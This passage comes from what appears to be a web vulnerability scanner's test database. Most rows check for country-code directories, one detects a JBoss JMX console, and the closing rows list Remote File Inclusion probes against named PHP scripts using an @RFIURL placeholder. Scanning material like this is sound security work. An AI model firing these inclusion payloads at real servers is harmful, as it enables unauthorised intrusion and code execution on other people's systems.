(China)\",\"\",\"\"\n\"003645\",\"\",\"1\",\"/cx/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Christmas Island)\",\"\",\"\"\n\"003646\",\"\",\"1\",\"/cc/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Cocos (keeling) Islands)\",\"\",\"\"\n\"003647\",\"\",\"1\",\"/co/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Colombia)\",\"\",\"\"\n\"003648\",\"\",\"1\",\"/km/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Comoros)\",\"\",\"\"\n\"003649\",\"\",\"1\",\"/cg/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Congo)\",\"\",\"\"\n\"003650\",\"\",\"1\",\"/cd/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (The Democratic Republic Of The Congo)\",\"\",\"\"\n\"003651\",\"\",\"1\",\"/ck/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Cook Islands)\",\"\",\"\"\n\"003652\",\"\",\"1\",\"/cr/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Costa Rica)\",\"\",\"\"\n\"003653\",\"\",\"1\",\"/ci/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (CÔte D'ivoire)\",\"\",\"\"\n\"003654\",\"\",\"1\",\"/hr/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Croatia)\",\"\",\"\"\n\"003655\",\"\",\"1\",\"/cu/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Cuba)\",\"\",\"\"\n\"003656\",\"\",\"1\",\"/cy/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Cyprus)\",\"\",\"\"\n\"003657\",\"\",\"1\",\"/cz/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Czech Republic)\",\"\",\"\"\n\"003658\",\"\",\"1\",\"/dk/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Denmark)\",\"\",\"\"\n\"003659\",\"\",\"1\",\"/dj/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Djibouti)\",\"\",\"\"\n\"003660\",\"\",\"1\",\"/dm/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Dominica)\",\"\",\"\"\n\"003661\",\"\",\"1\",\"/do/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Dominican Republic)\",\"\",\"\"\n\"003662\",\"\",\"1\",\"/ec/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Ecuador)\",\"\",\"\"\n\"003663\",\"\",\"1\",\"/eg/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Egypt)\",\"\",\"\"\n\"003664\",\"\",\"1\",\"/sv/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (El Salvador)\",\"\",\"\"\n\"003665\",\"\",\"1\",\"/gq/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Equatorial Guinea)\",\"\",\"\"\n\"003666\",\"\",\"1\",\"/er/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Eritrea)\",\"\",\"\"\n\"003667\",\"\",\"1\",\"/ee/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Estonia)\",\"\",\"\"\n\"003668\",\"\",\"1\",\"/et/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Ethiopia)\",\"\",\"\"\n\"003669\",\"\",\"1\",\"/fk/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Falkland Islands (malvinas))\",\"\",\"\"\n\"003670\",\"\",\"1\",\"/fo/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Faroe Islands)\",\"\",\"\"\n\"003671\",\"\",\"1\",\"/fj/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Fiji)\",\"\",\"\"\n\"003672\",\"\",\"1\",\"/fi/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Finland)\",\"\",\"\"\n\"003673\",\"\",\"1\",\"/fr/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (France)\",\"\",\"\"\n\"003674\",\"\",\"1\",\"/gf/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (French Guiana)\",\"\",\"\"\n\"003675\",\"\",\"1\",\"/pf/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (French Polynesia)\",\"\",\"\"\n\"003676\",\"\",\"1\",\"/tf/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (French Southern Territories)\",\"\",\"\"\n\"003677\",\"\",\"1\",\"/ga/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Gabon)\",\"\",\"\"\n\"003678\",\"\",\"1\",\"/gm/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Gambia)\",\"\",\"\"\n\"003679\",\"\",\"1\",\"/ge/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Georgia)\",\"\",\"\"\n\"003680\",\"\",\"1\",\"/de/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Germany)\",\"\",\"\"\n\"003681\",\"\",\"1\",\"/gh/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Ghana)\",\"\",\"\"\n\"003682\",\"\",\"1\",\"/gi/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Gibraltar)\",\"\",\"\"\n\"003683\",\"\",\"1\",\"/gr/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Greece)\",\"\",\"\"\n\"003684\",\"\",\"1\",\"/gl/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Greenland)\",\"\",\"\"\n\"003685\",\"\",\"1\",\"/gd/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Grenada)\",\"\",\"\"\n\"003686\",\"\",\"1\",\"/gp/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Guadeloupe)\",\"\",\"\"\n\"003687\",\"\",\"1\",\"/gu/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Guam)\",\"\",\"\"\n\"003688\",\"\",\"1\",\"/gt/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Guatemala)\",\"\",\"\"\n\"003689\",\"\",\"1\",\"/gg/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Guernsey)\",\"\",\"\"\n\"003690\",\"\",\"1\",\"/gn/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Guinea)\",\"\",\"\"\n\"003691\",\"\",\"1\",\"/gw/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Guinea-bissau)\",\"\",\"\"\n\"003692\",\"\",\"1\",\"/gy/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Guyana)\",\"\",\"\"\n\"003693\",\"\",\"1\",\"/ht/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Haiti)\",\"\",\"\"\n\"003694\",\"\",\"1\",\"/hm/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Heard Island And Mcdonald Islands)\",\"\",\"\"\n\"003695\",\"\",\"1\",\"/va/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Holy See (vatican City State))\",\"\",\"\"\n\"003696\",\"\",\"1\",\"/hn/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Honduras)\",\"\",\"\"\n\"003697\",\"\",\"1\",\"/hk/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Hong Kong)\",\"\",\"\"\n\"003698\",\"\",\"1\",\"/hu/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Hungary)\",\"\",\"\"\n\"003699\",\"\",\"1\",\"/is/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Iceland)\",\"\",\"\"\n\"003700\",\"\",\"1\",\"/in/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (India)\",\"\",\"\"\n\"003701\",\"\",\"1\",\"/id/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Indonesia)\",\"\",\"\"\n\"003702\",\"\",\"1\",\"/ir/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Islamic Republic Of Iran)\",\"\",\"\"\n\"003703\",\"\",\"1\",\"/iq/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Iraq)\",\"\",\"\"\n\"003704\",\"\",\"1\",\"/ie/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Ireland)\",\"\",\"\"\n\"003705\",\"\",\"1\",\"/im/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Isle Of Man)\",\"\",\"\"\n\"003706\",\"\",\"1\",\"/il/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Israel)\",\"\",\"\"\n\"003707\",\"\",\"1\",\"/it/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Italy)\",\"\",\"\"\n\"003708\",\"\",\"1\",\"/jm/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Jamaica)\",\"\",\"\"\n\"003709\",\"\",\"1\",\"/jp/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Japan)\",\"\",\"\"\n\"003710\",\"\",\"1\",\"/je/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Jersey)\",\"\",\"\"\n\"003711\",\"\",\"1\",\"/jo/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Jordan)\",\"\",\"\"\n\"003712\",\"\",\"1\",\"/kz/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Kazakhstan)\",\"\",\"\"\n\"003713\",\"\",\"1\",\"/ke/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Kenya)\",\"\",\"\"\n\"003714\",\"\",\"1\",\"/ki/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Kiribati)\",\"\",\"\"\n\"003715\",\"\",\"1\",\"/kp/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Democratic People's Republic Of Korea)\",\"\",\"\"\n\"003716\",\"\",\"1\",\"/kr/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Republic Of Korea)\",\"\",\"\"\n\"003717\",\"\",\"1\",\"/kw/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Kuwait)\",\"\",\"\"\n\"003718\",\"\",\"1\",\"/kg/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Kyrgyzstan)\",\"\",\"\"\n\"003719\",\"\",\"1\",\"/la/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Lao People's Democratic Republic)\",\"\",\"\"\n\"003720\",\"\",\"1\",\"/lv/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Latvia)\",\"\",\"\"\n\"003721\",\"\",\"1\",\"/lb/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Lebanon)\",\"\",\"\"\n\"003722\",\"\",\"1\",\"/ls/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Lesotho)\",\"\",\"\"\n\"003723\",\"\",\"1\",\"/lr/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Liberia)\",\"\",\"\"\n\"003724\",\"\",\"1\",\"/ly/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Libyan Arab Jamahiriya)\",\"\",\"\"\n\"003725\",\"\",\"1\",\"/li/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Liechtenstein)\",\"\",\"\"\n\"003726\",\"\",\"1\",\"/lt/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Lithuania)\",\"\",\"\"\n\"003727\",\"\",\"1\",\"/lu/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Luxembourg)\",\"\",\"\"\n\"003728\",\"\",\"1\",\"/mo/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Macao)\",\"\",\"\"\n\"003729\",\"\",\"1\",\"/mk/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Macedonia)\",\"\",\"\"\n\"003730\",\"\",\"1\",\"/mg/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Madagascar)\",\"\",\"\"\n\"003731\",\"\",\"1\",\"/mw/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Malawi)\",\"\",\"\"\n\"003732\",\"\",\"1\",\"/my/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Malaysia)\",\"\",\"\"\n\"003733\",\"\",\"1\",\"/mv/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Maldives)\",\"\",\"\"\n\"003734\",\"\",\"1\",\"/ml/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Mali)\",\"\",\"\"\n\"003735\",\"\",\"1\",\"/mt/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Malta)\",\"\",\"\"\n\"003736\",\"\",\"1\",\"/mh/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Marshall Islands)\",\"\",\"\"\n\"003737\",\"\",\"1\",\"/mq/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Martinique)\",\"\",\"\"\n\"003738\",\"\",\"1\",\"/mr/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Mauritania)\",\"\",\"\"\n\"003739\",\"\",\"1\",\"/mu/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Mauritius)\",\"\",\"\"\n\"003740\",\"\",\"1\",\"/yt/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Mayotte)\",\"\",\"\"\n\"003741\",\"\",\"1\",\"/mx/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Mexico)\",\"\",\"\"\n\"003742\",\"\",\"1\",\"/fm/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Federated States Of Micronesia)\",\"\",\"\"\n\"003743\",\"\",\"1\",\"/md/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Republic Of Moldova)\",\"\",\"\"\n\"003744\",\"\",\"1\",\"/mc/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Monaco)\",\"\",\"\"\n\"003745\",\"\",\"1\",\"/mn/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Mongolia)\",\"\",\"\"\n\"003746\",\"\",\"1\",\"/me/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Montenegro)\",\"\",\"\"\n\"003747\",\"\",\"1\",\"/ms/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Montserrat)\",\"\",\"\"\n\"003748\",\"\",\"1\",\"/ma/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Morocco)\",\"\",\"\"\n\"003749\",\"\",\"1\",\"/mz/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Mozambique)\",\"\",\"\"\n\"003750\",\"\",\"1\",\"/mm/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Myanmar)\",\"\",\"\"\n\"003751\",\"\",\"1\",\"/na/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Namibia)\",\"\",\"\"\n\"003752\",\"\",\"1\",\"/nr/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Nauru)\",\"\",\"\"\n\"003753\",\"\",\"1\",\"/np/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Nepal)\",\"\",\"\"\n\"003754\",\"\",\"1\",\"/nl/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Netherlands)\",\"\",\"\"\n\"003755\",\"\",\"1\",\"/an/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Netherlands Antilles)\",\"\",\"\"\n\"003756\",\"\",\"1\",\"/nc/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (New Caledonia)\",\"\",\"\"\n\"003757\",\"\",\"1\",\"/nz/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (New Zealand)\",\"\",\"\"\n\"003758\",\"\",\"1\",\"/ni/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Nicaragua)\",\"\",\"\"\n\"003759\",\"\",\"1\",\"/ne/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Niger)\",\"\",\"\"\n\"003760\",\"\",\"1\",\"/ng/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Nigeria)\",\"\",\"\"\n\"003761\",\"\",\"1\",\"/nu/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Niue)\",\"\",\"\"\n\"003762\",\"\",\"1\",\"/nf/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Norfolk Island)\",\"\",\"\"\n\"003763\",\"\",\"1\",\"/mp/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Northern Mariana Islands)\",\"\",\"\"\n\"003764\",\"\",\"1\",\"/no/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Norway)\",\"\",\"\"\n\"003765\",\"\",\"1\",\"/om/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Oman)\",\"\",\"\"\n\"003766\",\"\",\"1\",\"/pk/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Pakistan)\",\"\",\"\"\n\"003767\",\"\",\"1\",\"/pw/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Palau)\",\"\",\"\"\n\"003768\",\"\",\"1\",\"/ps/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Palestinian Territory)\",\"\",\"\"\n\"003769\",\"\",\"1\",\"/pa/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Panama)\",\"\",\"\"\n\"003770\",\"\",\"1\",\"/pg/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Papua New Guinea)\",\"\",\"\"\n\"003771\",\"\",\"1\",\"/py/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Paraguay)\",\"\",\"\"\n\"003772\",\"\",\"1\",\"/pe/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Peru)\",\"\",\"\"\n\"003773\",\"\",\"1\",\"/ph/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Philippines)\",\"\",\"\"\n\"003774\",\"\",\"1\",\"/pn/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Pitcairn)\",\"\",\"\"\n\"003775\",\"\",\"1\",\"/pl/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Poland)\",\"\",\"\"\n\"003776\",\"\",\"1\",\"/pt/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Portugal)\",\"\",\"\"\n\"003777\",\"\",\"1\",\"/pr/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Puerto Rico)\",\"\",\"\"\n\"003778\",\"\",\"1\",\"/qa/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Qatar)\",\"\",\"\"\n\"003779\",\"\",\"1\",\"/re/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (RÉunion)\",\"\",\"\"\n\"003780\",\"\",\"1\",\"/ro/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Romania)\",\"\",\"\"\n\"003781\",\"\",\"1\",\"/ru/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Russian Federation)\",\"\",\"\"\n\"003782\",\"\",\"1\",\"/rw/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Rwanda)\",\"\",\"\"\n\"003783\",\"\",\"1\",\"/bl/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Saint BarthÉlemy)\",\"\",\"\"\n\"003784\",\"\",\"1\",\"/sh/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Saint Helena)\",\"\",\"\"\n\"003785\",\"\",\"1\",\"/kn/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Saint Kitts And Nevis)\",\"\",\"\"\n\"003786\",\"\",\"1\",\"/lc/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Saint Lucia)\",\"\",\"\"\n\"003787\",\"\",\"1\",\"/mf/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Saint Martin)\",\"\",\"\"\n\"003788\",\"\",\"1\",\"/pm/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Saint Pierre And Miquelon)\",\"\",\"\"\n\"003789\",\"\",\"1\",\"/vc/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Saint Vincent And The Grenadines)\",\"\",\"\"\n\"003790\",\"\",\"1\",\"/ws/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Samoa)\",\"\",\"\"\n\"003791\",\"\",\"1\",\"/sm/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (San Marino)\",\"\",\"\"\n\"003792\",\"\",\"1\",\"/st/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Sao Tome And Principe)\",\"\",\"\"\n\"003793\",\"\",\"1\",\"/sa/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Saudi Arabia)\",\"\",\"\"\n\"003794\",\"\",\"1\",\"/sn/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Senegal)\",\"\",\"\"\n\"003795\",\"\",\"1\",\"/rs/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Serbia)\",\"\",\"\"\n\"003796\",\"\",\"1\",\"/sc/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Seychelles)\",\"\",\"\"\n\"003797\",\"\",\"1\",\"/sl/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Sierra Leone)\",\"\",\"\"\n\"003798\",\"\",\"1\",\"/sg/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Singapore)\",\"\",\"\"\n\"003799\",\"\",\"1\",\"/sk/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Slovakia)\",\"\",\"\"\n\"003800\",\"\",\"1\",\"/si/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Slovenia)\",\"\",\"\"\n\"003801\",\"\",\"1\",\"/sb/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Solomon Islands)\",\"\",\"\"\n\"003802\",\"\",\"1\",\"/so/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Somalia)\",\"\",\"\"\n\"003803\",\"\",\"1\",\"/za/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (South Africa)\",\"\",\"\"\n\"003804\",\"\",\"1\",\"/gs/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (South Georgia And The South Sandwich Islands)\",\"\",\"\"\n\"003805\",\"\",\"1\",\"/es/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Spain)\",\"\",\"\"\n\"003806\",\"\",\"1\",\"/lk/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Sri Lanka)\",\"\",\"\"\n\"003807\",\"\",\"1\",\"/sd/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Sudan)\",\"\",\"\"\n\"003808\",\"\",\"1\",\"/sr/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Suriname)\",\"\",\"\"\n\"003809\",\"\",\"1\",\"/sj/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Svalbard And Jan Mayen)\",\"\",\"\"\n\"003810\",\"\",\"1\",\"/sz/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Swaziland)\",\"\",\"\"\n\"003811\",\"\",\"1\",\"/se/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Sweden)\",\"\",\"\"\n\"003812\",\"\",\"1\",\"/ch/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Switzerland)\",\"\",\"\"\n\"003813\",\"\",\"1\",\"/sy/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Syrian Arab Republic)\",\"\",\"\"\n\"003814\",\"\",\"1\",\"/tw/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Taiwan)\",\"\",\"\"\n\"003815\",\"\",\"1\",\"/tj/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Tajikistan)\",\"\",\"\"\n\"003816\",\"\",\"1\",\"/tz/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (United Republic Of Tanzania)\",\"\",\"\"\n\"003817\",\"\",\"1\",\"/th/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Thailand)\",\"\",\"\"\n\"003818\",\"\",\"1\",\"/tl/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Timor-leste)\",\"\",\"\"\n\"003819\",\"\",\"1\",\"/tg/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Togo)\",\"\",\"\"\n\"003820\",\"\",\"1\",\"/tk/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Tokelau)\",\"\",\"\"\n\"003821\",\"\",\"1\",\"/to/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Tonga)\",\"\",\"\"\n\"003822\",\"\",\"1\",\"/tt/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Trinidad And Tobago)\",\"\",\"\"\n\"003823\",\"\",\"1\",\"/tn/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Tunisia)\",\"\",\"\"\n\"003824\",\"\",\"1\",\"/tr/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Turkey)\",\"\",\"\"\n\"003825\",\"\",\"1\",\"/tm/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Turkmenistan)\",\"\",\"\"\n\"003826\",\"\",\"1\",\"/tc/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Turks And Caicos Islands)\",\"\",\"\"\n\"003827\",\"\",\"1\",\"/tv/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Tuvalu)\",\"\",\"\"\n\"003828\",\"\",\"1\",\"/ug/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Uganda)\",\"\",\"\"\n\"003829\",\"\",\"1\",\"/ua/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Ukraine)\",\"\",\"\"\n\"003830\",\"\",\"1\",\"/ae/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (United Arab Emirates)\",\"\",\"\"\n\"003831\",\"\",\"1\",\"/gb/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (United Kingdom)\",\"\",\"\"\n\"003832\",\"\",\"1\",\"/us/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (United States)\",\"\",\"\"\n\"003833\",\"\",\"1\",\"/um/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (United States Minor Outlying Islands)\",\"\",\"\"\n\"003834\",\"\",\"1\",\"/uy/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Uruguay)\",\"\",\"\"\n\"003835\",\"\",\"1\",\"/uz/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Uzbekistan)\",\"\",\"\"\n\"003836\",\"\",\"1\",\"/vu/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Vanuatu)\",\"\",\"\"\n\"003837\",\"\",\"1\",\"/ve/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Venezuela)\",\"\",\"\"\n\"003838\",\"\",\"1\",\"/vn/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Viet Nam)\",\"\",\"\"\n\"003839\",\"\",\"1\",\"/vg/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (British Virgin Islands)\",\"\",\"\"\n\"003840\",\"\",\"1\",\"/vi/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (U.S. Virgin Islands)\",\"\",\"\"\n\"003841\",\"\",\"1\",\"/wf/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Wallis And Futuna)\",\"\",\"\"\n\"003842\",\"\",\"1\",\"/eh/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Western Sahara)\",\"\",\"\"\n\"003843\",\"\",\"1\",\"/ye/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Yemen)\",\"\",\"\"\n\"003844\",\"\",\"1\",\"/zm/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Zambia)\",\"\",\"\"\n\"003845\",\"\",\"1\",\"/zw/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Zimbabwe)\",\"\",\"\"\n\"003846\",\"\",\"3be\",\"/jmx-console/\",\"GET\",\"BODY:ObjectName\",\"JBoss JMX Agent View found.\",\"\",\"\"\n\"003848\",\"\",\"1\",\"/www/2\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"003849\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003850\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/123flashchat.php?e107path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003851\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003852\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/22_ultimate/templates/header.php?mainpath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003853\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/22_ultimate/templates/header.php?mainpath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI 